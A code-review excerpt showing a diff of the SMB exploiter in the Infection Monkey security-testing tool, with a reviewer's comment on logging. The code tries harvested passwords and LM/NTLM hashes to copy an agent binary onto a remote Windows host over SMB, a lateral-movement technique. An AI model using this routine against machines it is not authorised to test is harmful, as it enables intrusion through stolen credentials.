monkey/infection_monkey/exploit/smbexec.py

```diff
@@ -1,179 +1,156 @@
 
-        # TODO use infectionmonkey.utils.brute_force
-        creds = self._config.get_exploit_user_password_or_hash_product()
-
-        exploited = False
         for user, password, lm_hash, ntlm_hash in creds:
             try:
                 # copy the file remotely using SMB
                 remote_full_path = SmbTools.copy_file(
                     self.host,
-                    src_path,
-                    self._config.dropper_target_path_win_32,
+                    agent_binary,
+                    dest_path,
                     user,
                     password,
                     lm_hash,
                     ntlm_hash,
-                    self._config.smb_download_timeout,
+                    self.options["smb_download_timeout"],
                 )
 
                 if remote_full_path is not None:
-                    logger.debug(
-                        "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) "
-                        "%s : (SHA-512) %s)",
-                        self.host,
-                        user,
-                        self._config.hash_sensitive_data(password),
-                        self._config.hash_sensitive_data(lm_hash),
-                        self._config.hash_sensitive_data(ntlm_hash),
+                    logger.info(
+                        f'Successfully logged in to {self.host.ip_addr} using user "{user}"'
                     )
                     self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
                     self.add_vuln_port(
                         "%s or %s"
                         % (
-                            SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
-                            SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
+                            SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1],
+                            SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1],
                         )
                     )
-                    exploited = True
+                    self.exploit_result.exploitation_success = True
                     break
                 else:
                     # failed exploiting with this user/pass
                     self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
 
             except Exception as exc:
                 logger.debug(
-                    "Exception when trying to copy file using SMB to %r with user:"
-                    " %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash ("
-                    "SHA-512): %s: (%s)",
-                    self.host,
-                    user,
-                    self._config.hash_sensitive_data(password),
-                    self._config.hash_sensitive_data(lm_hash),
-                    self._config.hash_sensitive_data(ntlm_hash),
-                    exc,
+                    "Error when trying to copy file using SMB to {self.host.ip_addr} with user "
+                    f'"{user}":{exc}'
```

Comment:
Same as previous comment, would be good to know which credential type is used for reproduction of the error